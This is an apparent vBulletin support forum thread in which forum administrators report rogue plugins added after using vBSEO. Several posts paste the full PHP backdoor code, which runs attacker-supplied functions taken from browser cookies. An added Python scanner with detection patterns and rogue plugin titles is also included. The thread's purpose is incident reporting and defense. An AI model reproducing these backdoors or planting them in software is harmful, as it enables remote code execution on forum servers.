Is This a Default Plugin?

  • deviataz
    New Member
    • Jul 2007
    • 26
    • 3.6.x

    #16
    Originally posted by Wayne Luke
    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
    There is no log for the rogue plugins called "vBulletin Templates Cookie Caching" & "vBCMS Global Thread Cache". Not at any board I've checked that has those plugins at least. It simply exists at one point?

    Comment

    • Wayne Luke
      vBulletin Technical Support Lead
      • Aug 2000
      • 73979

      #17
      Originally posted by DelDrago
      This "vbCMS Global Thread Cache" has appeared on my site as well.

      Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
      Besides the plugin, what damage is there?

      However you should change all your passwords... Email, FTP, Admin CP, vBSEO, etc... Especially if you shared passwords among accounts or used any password shorter than 12 characters.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API

      Comment

      • Talaturen
        New Member
        • Dec 2005
        • 12
        • 3.8.x

        #18
        Originally posted by Wayne Luke
        Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
        I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).

        Comment

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73979

          #19
          Originally posted by Talaturen
          I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).
          vBSEO's release announcement suggests otherwise though. http://www.vbseo.com/f5/vbseo-securi...release-52783/

          I'd say we're all working to make the software as secure as possible. Eliminating any potential vector achieves that.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment

          • Archaic
            Senior Member
            • Dec 2002
            • 145
            • 3.8.x

            #20
            vBSEO's release announcement is incorrect then, because I've had another plugin added to the same spot even after making their update.

            I just made a post about it on their forums, which I've quoted below for convenience.

            Not sure if it might be related to this issue or not, but when I went and did a file diagnostics on my forum, it found that the file md5_sums_crawlability_vbseo.php was missing. Seeing as I installed vBSEO for the first time with the current version, I find it unlikely I would've missed uploading it when I installed the package.

            EDIT:
            It looks like the plugin is back and worse than before. Just went into my plugin manager to check, and found this under global_complete.

            vBulletin Templates Cookie Caching
            Code:
            /* vBulletin Templates Cookie Caching */
            $vbr="ofkqjhri";$vbh="158b2179e61097612d74754bbc1e8c7a";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
            EDIT 2:
            Okay, just went to my admin log and checked. The plugin being added is clearly shown there, however it's being shown as added by me and with the IP I am currently using.

            Here's the kicker though. At pretty much the exact time this plugin was added, I'd made the vBSEO config file writable so that I could change some settings. The timing seems too much to be a coincidence.
            神出鬼没 - shin shutsu ki botsu

            Webmaster, Bulbagarden / Bulbapedia

            Comment

            • Zachery
              Former vBulletin Support
              • Jul 2002
              • 59097

              #21
              If they've done something else after already gaining access, they could be sneaking the plugin back in in a large number of ways.

              Comment

              • galerio
                Member
                • Jan 2011
                • 60

                #22
                This is a VBSEO security issue: as soon as you log into VBSEO control panel, the plugin appears!!!!
                This is now confirmed by all other vbseo members

                Comment

                • baghdad4ever
                  Senior Member
                  • Apr 2007
                  • 587
                  • 4.1.x

                  #23
                  Originally posted by galerio
                  This is a VBSEO security issue: as soon as you log into VBSEO control panel, the plugin appears!!!!
                  This is now confirmed by all other vbseo members
                  yes

                  you are right

                  Comment

                  • alaska_av8r
                    Senior Member
                    • Dec 2009
                    • 181
                    • 3.8.x

                    #24
                    Okay I have this plugin that I didn't install:

                    vBulletin Templates Cookie Caching

                    here is the code:
                    Code:
                    /* vBulletin Templates Cookie Caching */
                    $vbr="hgfzshne";$vbh="49cfac7025dfd5d00dc5a080c4a5c637";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
                    Is this an exploit and what do I need to do?

                    Comment

                    • Archaic
                      Senior Member
                      • Dec 2002
                      • 145
                      • 3.8.x

                      #25
                      Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
                      神出鬼没 - shin shutsu ki botsu

                      Webmaster, Bulbagarden / Bulbapedia

                      Comment

                      • Adam H
                        Senior Member
                        • Apr 2008
                        • 139
                        • 4.1.x

                        #26
                        Confirmed another name for it

                        Code:
                         /* vBulletin Dynamic Menu Filters */
                        (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
                        Found on a 4.1.8 install with VBSEO 3.6.
                        The opinions expressed in forum posts are my own personal opinions and do not represent any companies that I am associated with.

                        Comment
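An added example, not part of any post in this thread and not vBulletin or vBSEO code: a Python check over exported plugin records that flags the structure both posted snippets share (a regex capture group taken from a cookie and invoked as a function) plus the plugin titles reported here. The record field names (`pluginid`, `title`, `hookname`, `phpcode`) and the sample records are assumptions constructed for illustration.

```python
import re

# Plugin titles reported as rogue in this thread (compared case-insensitively).
ROGUE_TITLES = {
    "vbulletin templates cookie caching",
    "vbcms global thread cache",
    "vbulletin dynamic menu filters",
}

# A regex capture used as a function name, e.g. $m[1]($m[2]).
VAR_CALL = re.compile(r"\$\w+\s*\[\s*\d+\s*\]\s*\(\s*\$\w+\s*\[\s*\d+\s*\]\s*\)")
# A cookie value parsed with preg_match within the same statement.
COOKIE_PARSE = re.compile(r"preg_match\s*\([^;]*\$_COOKIE\s*\[", re.I)


def classify(plugin):
    """Return the list of reasons a plugin record deserves review (empty if none)."""
    reasons = []
    if plugin["title"].strip().lower() in ROGUE_TITLES:
        reasons.append("title reported as rogue")
    code = plugin["phpcode"]
    if VAR_CALL.search(code):
        reasons.append("capture group called as a function")
        if COOKIE_PARSE.search(code):
            reasons.append("function name and argument come from a cookie")
    return reasons


def scan(plugins):
    """Map pluginid -> reasons for every record with at least one finding."""
    return {p["pluginid"]: r for p in plugins if (r := classify(p))}


# Constructed sample records; the field names are an assumed export format.
SAMPLE = [
    # Reads a cookie but never calls its content: not flagged.
    {"pluginid": 1, "title": "Forum Stats Sidebar", "hookname": "forumhome_start",
     "phpcode": '$lang = isset($_COOKIE["lang"]) ? $_COOKIE["lang"] : "en";'},
    # Renamed plugin with the same structure as the snippets in the thread.
    {"pluginid": 2, "title": "Style Helper", "hookname": "global_complete",
     "phpcode": '(isset($_COOKIE["x"]) && preg_match("/menu:([a-z]+):(.*)/",'
                '$_COOKIE["x"],$m))?$m[1]($m[2]):chr(20);'},
    # Title match only; body unavailable in this constructed record.
    {"pluginid": 3, "title": "vBCMS Global Thread Cache", "hookname": "global_complete",
     "phpcode": "/* body not available */"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE).items():
        print(pid, "; ".join(reasons))
```

Matching on structure rather than title matters here because the thread shows the same backdoor under several names; the title list only catches copies that were not renamed.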

                        • Archaic
                          Senior Member
                          • Dec 2002
                          • 145
                          • 3.8.x

                          #27
                          Same location as the previous ones?
                          神出鬼没 - shin shutsu ki botsu

                          Webmaster, Bulbagarden / Bulbapedia

                          Comment

                          • Adam H
                            Senior Member
                            • Apr 2008
                            • 139
                            • 4.1.x

                            #28
                            Originally posted by Archaic
                            Same location as the previous ones?
                            Yes, same location. I've checked 21 clients' sites so far; 2 of them have been affected, and a test site that was only set up last week has also been affected. So far I've found nothing else apart from the plugin, but I am disabling VBSEO as a precaution.
                            The opinions expressed in forum posts are my own personal opinions and do not represent any companies that I am associated with.

                            Comment

                            • Talaturen
                              New Member
                              • Dec 2005
                              • 12
                              • 3.8.x

                              #29
                              See: http://www.vbseo.com/f5/vbseo-securi...tml#post325689

                              Comment

                              • alaska_av8r
                                Senior Member
                                • Dec 2009
                                • 181
                                • 3.8.x

                                #30
                                Originally posted by Archaic
                                Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
                                Will do!

                                Comment
